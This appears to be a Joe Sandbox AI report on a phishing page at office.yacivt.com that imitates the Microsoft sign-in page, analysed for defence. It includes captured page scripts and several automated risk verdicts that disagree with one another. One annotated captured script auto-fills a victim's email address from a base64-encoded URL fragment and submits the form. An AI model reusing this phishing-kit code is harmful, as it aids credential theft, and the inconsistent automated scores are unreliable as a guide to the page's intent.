wQAWKX7W4gtrPqy8-ovgh1zOZRXMDyCt-8tXE-A2110vJYi2der3W4JaYeVg\u0026response_mode=form_post\u0026nonce=638700663924236788.M2JhMTQ3M2MtOTY5ZS00ODU1LWFkZGEtNDA3N2M2NjI0MGM0MTEwZDlkOTEtMWY3Yi00NmNmLWE3ZjMtOTA3MTZiN2YzMjJj\u0026x-client-SKU=ID_NET8_0\u0026x-client-Ver=7.5.1.0\u0026uaid=37a7e2c64a3b47f6a0afccced59b0b1f\u0026msproxy=1\u0026issuer=mso\u0026tenant=common\u0026ui_locales=en-US\u0026epct=PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeiPn_FX6mdVl3cVMajz3UDii-wAGw3UOUjMJiZKPah4g1ZRLJfWFaVypgbbAMV4HwzxNwvZEVhGpdiYpFEA8Nt9EMUs4oDRiS-hkctjgRdfgorAQ1PJt-ZhIOaPQhcBDQHpXFYpMEk0h3L5QbRV-S7Z5UXPmcAujUfMRxU1LpJRThRm1dbDDIgf652bCsCKXDlp7h8xpN4XDkSnv4-fTD9SAA\u0026jshs=0\u0026idp_hint=github.com","arrExternalTrustedRealmFederatedIdps":[],"fShowSignInWithGitHubOnlyOnCredPicker":true,"fEnableShowResendCode":true,"iShowResendCodeDelay":90000,"sSMSCtryPhoneData":"AF~Afghanistan~93!!!AX~land Islands~358!!!AL~Albania~355!!!DZ~Algeria~213!!!AS~American Samoa~1!!!AD~Andorra~376!!!AO~Angola~244!!!AI~Anguilla~1!!!AG~Antigua and Barbuda~1!!!AR~Argentina~54!!!AM~Armenia~374!!!AW~Aruba~297!!!AC~Ascension Island~247!!!AU~Australia~61!!!AT~Austria~43!!!AZ~Azerbaijan~994!!!BS~Bahamas~1!!!BH~Bahrain~973!!!BD~Bangladesh~880!!!BB~Barbados~1!!!BY~Belarus~375!!!BE~Bel
|
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a utility library for managing asynchronous script loading and execution. It does not contain any high-risk indicators like dynamic code execution, data exfiltration, or redirects to malicious domains. The script uses standard web APIs and practices, such as DOM manipulation and event handling, which are common in legitimate web applications. While it uses some legacy APIs like `XDomainRequest`, the overall behavior is consistent with a script focused on improving web page performance and loading. Therefore, this script is assessed as low risk."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded",o,!1),e.removeEventListener("load",n,!1)):r.attachEvent&&(r.detachEvent("onreadystatechange",o),e.detachEvent("onload",n))}var a=!1,s=!1;if("complete"===r.readyState){return void setTimeout(n)}!function(){r.addEventListener?(r.addEventListener("DOMContentLoaded",o,!1),e.addEventListener("load",n,!1)):r.attachEvent&&(r.attachEvent("onreadystatechange",o),e.attachEvent("onload",n))}()}(window,document),function(){function e(){
return f.$Config||f.ServerData||{}}function r(e,r){var t=f.$Debug;t&&t.appendLog&&(r&&(e+=" '"+(r.src||r.href||"")+"'",e+=", id:"+(r.id||""),e+=", async:"+(r.async||""),e+=", defer:"+(r.defer||"")),t.appendLog(e))}function t(){var e=f.$B;if(void 0===d){if(e){d=e.IE}else{var r=f.navigator.userAgent;d=-1!==r.indexOf("MSIE ")||-1!==r.indexOf("Trident/")}}return d}function n(){var e=f.$B;if(void 0===l){if(e){l=e.RE_Edge}else{var r=f.navigator.userAgent;l=-1!==r.indexOf("Edge")}}return l}function o(e){
var r=e.indexOf("?"),t=r>-1?r:e.length,n=e.lastIndexOf(".",t);return e.substring(n,n+h.length).toLowerCase()===h}function i(){var r=e();return(r.loader||{}).slReportFailure||r.slReportFailure||!1}function a(){return(e().loader||{}).redirectToErrorPageOnLoadFailure||!1}function s(){return(e().loader||{}).logByThrowing||!1}function u(e){if(!t()&&!n()){return!1}var r=e.src||e.href||"";if(!r){return!0}if(o(r)){var i,a,s;try{i=e.sheet,a=i&&i.cssRules,s=!1}catch(e){s=!0}if(i&&!a&&s){return!0}
if(i&&a&&0===a.length){return!0}}return!1}function c(){function t(e){g.getElementsByTagName("head")[0].appendChild(e)}function n(e,r,t,n){var u=null;return u=o(e)?i(e):"script"===n.toLowerCase()?a(e):s(e,n),r&&(u.id=r),"function"==typeof u.setAttribute&&(u.setAttribute("crossorigin","anonymous"),t&&"string"==typeof t&&u.setAttribute("integrity",t)),u}function i(e){var r=g.createElement("link");return r.rel="stylesheet",r.type="text/css",r.href=e,r}function a(e){
var r=g.createElement("script"),t=g.querySelector("s |
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script appears to be a configuration object for a web application, but it contains several indicators that raise moderate security concerns. The script includes external data transmission to the `aadcdn.msauth.net` domain, which could potentially be used for data exfiltration. Additionally, the script uses obfuscated URLs and contains a redirect to the `react.yacivt.com` domain, which is of unknown reputation. While the script may have legitimate purposes, the combination of these behaviors warrants further investigation to ensure there are no malicious intentions."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://aadcdn.msauth.net/shared/1.0/","urlDefaultFavicon":"https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/common/oauth2/v2.0/authorize?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f\u0026client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026mkt=en-US\u0026nonce=638700663924236788.M2JhMTQ3M2MtOTY5ZS00ODU1LWFkZGEtNDA3N2M2NjI0MGM0MTEwZDlkOTEtMWY3Yi00NmNmLWE3ZjMtOTA3MTZiN2YzMjJj\u0026redirect_uri=https%3a%2f%2freact.yacivt.com%2flandingv2\u0026response_mode=form_post\u0026response_type=code+id_token\u0026scope=openid+profile+https%3a%2f%2freact.yacivt.com%2fv2%2fOfficeHome.All\u0026state=l6BTM8D70dyZpNtlmK9yP7pGcVJJkYIuCnzjG4ZCjnuNmRf69zWEx5SNwmNeeCLEHhtNj3-XJVrZR76PiFDwL1SwilGZk2eEVrXFdAiBU72BufoEi41Y172sL8lPoxuYI8o6qHDNnvcdKMbCR0XzEc-yC94Vsm8XhjIPAE1BAsxOTqaWVneplzoe-4aZvR8YHENzT2sxUahoRcn7Lzj6NsqiVdwQAWKX7W4gtrPqy8-ovgh1zOZRXMDyCt-8tXE-A2110vJYi2der3W4JaYeVg\u0026ui_locales=en-US\u0026x-client-SKU=ID_NET8_0\u0026x-client-ver=7.5.1.0\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://office.yacivt.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/sso?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f","iwaSsoProbeUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/ssoprobe?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f","iwaIFrameUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/iframe?client-request-id=37a7e2c6-4a
3b-47f6-a0af-ccced59b0b1f\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://autologon.microsoftazuread-sso.com/common/winauth/sso/edgeredirect?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f\u0026origin=office.yacivt.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":1013,"hpgact":1800,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeZpn0V2Qmk6ddyuxKMT9QVwEREbEVY5iRFcq7HnzXorFYnqsFn0rsY0KcHnIHBsK76BmeRkFs4WeQh5DX8jXIJ2KNNdgeA6g68K7pslzqlP0EjxrPz-d0E-6I_LU8xRQmIz_tyEY1fxxxidzOQ3MFzuW_OajrG5jjU19zlF3F_klKoidaO2D6nD34ZwNj5MKv3i5jdVGVyKbT6h1ZiZo
|
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The script appears to be attempting to automatically fill in user credentials and submit a login form, which is a common phishing technique. Additionally, the script uses obfuscated code and base64 encoding, further raising suspicion. While the script may have a legitimate purpose, the overall behavior and lack of transparency suggest a high-risk scenario that requires further investigation."
} |
/**
 * Captured page script (sandbox evidence, code left byte-identical).
 *
 * Polls every 500 ms until the page URL contains a '#' and the element
 * `#i0116` exists. It then writes the text after the first '#' into that
 * element (base64-decoded when the text passes the charset test below) and
 * clicks `#idSIButton9`, all without user interaction.
 *
 * Analyst notes:
 * - Presumably `#i0116` is the account-name input and `#idSIButton9` the
 *   "Next" button of the imitated sign-in form; this report lists an
 *   "Email, phone, or Skype" field and a "Next" button for the page, but the
 *   element ids are not tied to those labels anywhere in the captured text.
 * - The value comes from the URL fragment, which browsers do not send in the
 *   HTTP request, so it will not appear in proxy or web-server logs. Recover
 *   it from the original lure link, browser history, or the console output
 *   this script produces.
 * - The console strings logged below ("YES!" and the base64 error message)
 *   are constant and can serve as pivots when searching sandbox console
 *   captures for related samples.
 */
function lp(){
// Looked up again on every poll, because the form may not be rendered yet.
var emailId = document.querySelector("#i0116");
var nextButton = document.querySelector("#idSIButton9");
var query = window.location.href;
// Only act when the URL carries a fragment; otherwise fall through to the re-poll below.
if (/#/.test(window.location.href)){
// data1 = URL up to the first '#', data2 = text between the first and (if any) second '#'.
var res = query.split("#");
var data1 = res[0];
var data2 = res[1];
// Both parts are written to the browser console on every poll that sees a fragment.
console.log(data1);
console.log(data2);
if (emailId != null) {
// Default to the raw fragment; replaced below only if base64 decoding succeeds.
var decodedString = data2;
if (/^[A-Za-z0-9+/=]+$/.test(data2)) { // charset test only: fragment consists solely of base64-alphabet characters
try {
// '=' characters are stripped before decoding.
decodedString = window.atob(data2.replace(/[=]/gi, ''));
} catch (e) {
// Decode failure is logged and the raw fragment is used as-is.
console.error('Error decoding base64 string:', e);
}
}
// Fill the input and advance the form programmatically.
emailId.focus();
emailId.value = decodedString;
nextButton.focus();
nextButton.click();
console.log("YES!");
// Polling stops here: no further timer is scheduled after a successful fill.
return;
}
}
// No fragment or no input element yet: try again in 500 ms (no retry limit).
setTimeout(function(){lp();}, 500);
}
// First poll is scheduled 500 ms after the script is evaluated.
setTimeout(function(){lp();}, 500);
|
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet appears to be a combination of utility functions and event handlers related to document loading and ready state. While it does not exhibit any high-risk behaviors, there are some moderate-risk indicators that warrant further review:
1. The script uses the `$Do` object, which is a custom utility for managing asynchronous function calls. This is a moderate-risk indicator as it could potentially be used for aggressive DOM manipulation or external data transmission.
2. The script registers event handlers for 'DOMContentLoaded' and 'load' events, which is a common practice for tracking document loading. However, the purpose of the data being transmitted is unclear.
Overall, the script seems to be focused on document lifecycle management, but the lack of transparency around the data being transmitted and the use of a custom utility object result in a medium-risk score. Further investigation may be needed to determine the full scope and intent of this script."
} |
//<![CDATA[
!function(){var e=window,r=e.$Debug=e.$Debug||{},t=e.$Config||{};if(!r.appendLog){var n=[],o=0;r.appendLog=function(e){var r=t.maxDebugLog||25,i=(new Date).toUTCString()+":"+e;n.push(o+":"+i),n.length>r&&n.shift(),o++},r.getLogs=function(){return n}}}(),function(){function e(e,r){function t(i){var a=e[i];if(i<n-1){return void(o.r[a]?t(i+1):o.when(a,function(){t(i+1)}))}r(a)}var n=e.length;t(0)}function r(e,r,i){function a(){var e=!!s.method,o=e?s.method:i[0],a=s.extraArgs||[],u=n.$WebWatson;try{
var c=t(i,!e);if(a&&a.length>0){for(var d=a.length,l=0;l<d;l++){c.push(a[l])}}o.apply(r,c)}catch(e){return void(u&&u.submitFromException&&u.submitFromException(e))}}var s=o.r&&o.r[e];return r=r||this,s&&(s.skipTimeout?a():n.setTimeout(a,0)),s}function t(e,r){return Array.prototype.slice.call(e,r?1:0)}var n=window;n.$Do||(n.$Do={"q":[],"r":[],"removeItems":[],"lock":0,"o":[]});var o=n.$Do;o.when=function(t,n){function i(e){r(e,a,s)||o.q.push({"id":e,"c":a,"a":s})}var a=0,s=[],u=1;"function"==typeof n||(a=n,
u=2);for(var c=u;c<arguments.length;c++){s.push(arguments[c])}t instanceof Array?e(t,i):i(t)},o.register=function(e,t,n){if(!o.r[e]){o.o.push(e);var i={};if(t&&(i.method=t),n&&(i.skipTimeout=n),arguments&&arguments.length>3){i.extraArgs=[];for(var a=3;a<arguments.length;a++){i.extraArgs.push(arguments[a])}}o.r[e]=i,o.lock++;try{for(var s=0;s<o.q.length;s++){var u=o.q[s];u.id==e&&r(e,u.c,u.a)&&o.removeItems.push(u)}}catch(e){throw e}finally{if(0===--o.lock){for(var c=0;c<o.removeItems.length;c++){
for(var d=o.removeItems[c],l=0;l<o.q.length;l++){if(o.q[l]===d){o.q.splice(l,1);break}}}o.removeItems=[]}}}},o.unregister=function(e){o.r[e]&&delete o.r[e]}}(),function(e,r){function t(){if(!a){if(!r.body){return void setTimeout(t)}a=!0,e.$Do.register("doc.ready",0,!0)}}function n(){if(!s){if(!r.body){return void setTimeout(n)}t(),s=!0,e.$Do.register("doc.load",0,!0),i()}}function o(e){(r.addEventListener||"load"===e.type||"complete"===r.readyState)&&t()}function i(){
r.addEventListener?(r.removeEventListener("DOMContentLoaded"
|
URL: https://office.yacivt.com/common/oauth2/v2.0/autho... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The script appears to be a configuration object for a web application, with various settings and parameters. While it does not contain any obvious high-risk indicators, there are some moderate-risk behaviors that warrant further review:
1. External Data Transmission (+2 points): The script sends user data to external domains like 'aadcdn.msauth.net' and 'office.yacivt.com' via various API calls and redirects.
2. Fallback Domains (+2 points): The script uses multiple fallback domains, some of which may be of unknown or dubious reputation.
3. Tracking Behavior (+1 point): The script includes analytics and telemetry functionality, which could potentially be used for tracking user behavior.
Overall, the script appears to be part of a legitimate web application, but the external data transmission and use of fallback domains raise some concerns that require further investigation to ensure there are no hidden malicious behaviors."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://aadcdn.msauth.net/shared/1.0/","urlDefaultFavicon":"https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/common/oauth2/v2.0/authorize?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f\u0026client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026mkt=en-US\u0026nonce=638700663924236788.M2JhMTQ3M2MtOTY5ZS00ODU1LWFkZGEtNDA3N2M2NjI0MGM0MTEwZDlkOTEtMWY3Yi00NmNmLWE3ZjMtOTA3MTZiN2YzMjJj\u0026redirect_uri=https%3a%2f%2freact.yacivt.com%2flandingv2\u0026response_mode=form_post\u0026response_type=code+id_token\u0026scope=openid+profile+https%3a%2f%2freact.yacivt.com%2fv2%2fOfficeHome.All\u0026state=l6BTM8D70dyZpNtlmK9yP7pGcVJJkYIuCnzjG4ZCjnuNmRf69zWEx5SNwmNeeCLEHhtNj3-XJVrZR76PiFDwL1SwilGZk2eEVrXFdAiBU72BufoEi41Y172sL8lPoxuYI8o6qHDNnvcdKMbCR0XzEc-yC94Vsm8XhjIPAE1BAsxOTqaWVneplzoe-4aZvR8YHENzT2sxUahoRcn7Lzj6NsqiVdwQAWKX7W4gtrPqy8-ovgh1zOZRXMDyCt-8tXE-A2110vJYi2der3W4JaYeVg\u0026ui_locales=en-US\u0026x-client-SKU=ID_NET8_0\u0026x-client-ver=7.5.1.0\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://office.yacivt.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/sso?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f","iwaSsoProbeUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/ssoprobe?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f","iwaIFrameUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/iframe?client-request-id=37a7e2c6-4a
3b-47f6-a0af-ccced59b0b1f\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://autologon.microsoftazuread-sso.com/common/winauth/sso/edgeredirect?client-request-id=37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f\u0026origin=office.yacivt.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"scid":1013,"hpgact":1800,"hpgid":6,"apiCanary":"PAQABDgEAAADW6jl31mB3T7ugrWTT8pFeZpn0V2Qmk6ddyuxKMT9QVwEREbEVY5iRFcq7HnzXorFYnqsFn0rsY0KcHnIHBsK76BmeRkFs4WeQh5DX8jXIJ2KNNdgeA6g68K7pslzqlP0EjxrPz-d0E-6I_LU8xRQmIz_tyEY1fxxxidzOQ3MFzuW_OajrG5jjU19zlF3F_klKoidaO2D6nD34ZwNj5MKv3i5jdVGVyKbT6h1ZiZoSJCAA","canary":"ffbnXLSdy9Zqh8N6Cat8qYreIXz2qtzZU6qGKSUXEPs=7:1:CANARY:G16ietcmtvOp2ZGinIO20HVNMl3o/5cBYqDlePEjmD8=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"37a7e2c6-4a3b-47f6-a0af-ccced59b0b1f","sessionId":"de1be4b4-6163-47f8-878d-d69a85427800","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":true,"strings":{"desktopsso":{"authenticatingmessage":"Trying to sign you in"}},"enums":{"ClientMetricsModes":{"None":0,"SubmitOnPost":1,"SubmitOnRedirect":2,"InstrumentPlt":4}},"urls":{"instr":{"pageload":"https://office.yacivt.com/common/instrumentation/reportpageload","dssost |
URL: https://office.yacivt.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHo Model: Joe Sandbox AI | {
"contains_trigger_text": false,
"trigger_text": "unknown",
"prominent_button_name": "Next",
"text_input_field_labels": [
"Email, phone, or Skype"
],
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
} |
|
URL: https://office.yacivt.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHo Model: Joe Sandbox AI | {
"brands": [
"Microsoft"
]
} |
|
URL: https://office.yacivt.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHo Model: Joe Sandbox AI | {
"legit_domain": "microsoft.com",
"classification": "wellknown",
"reasons": [
"The brand 'Microsoft' is well-known and typically associated with the domain 'microsoft.com'.",
"The URL 'office.yacivt.com' does not match the legitimate domain 'microsoft.com'.",
"The domain 'yacivt.com' is not associated with Microsoft, which is suspicious.",
"The use of 'office' as a subdomain could be an attempt to mimic Microsoft's Office services.",
"The presence of input fields for 'Email, phone, or Skype' is typical for phishing attempts targeting Microsoft accounts."
],
"riskscore": 9
}
Google indexed: False |
URL: office.yacivt.com
Brands: Microsoft
Input Fields: Email, phone, or Skype |
URL: https://yacivt.com Model: Joe Sandbox AI | {
"typosquatting": false,
"unusual_query_string": false,
"suspicious_tld": false,
"ip_in_url": false,
"long_subdomain": false,
"malicious_keywords": false,
"encoded_characters": false,
"redirection": false,
"contains_email_address": false,
"known_domain": false,
"brand_spoofing_attempt": false,
"third_party_hosting": false
} |
URL: https://yacivt.com |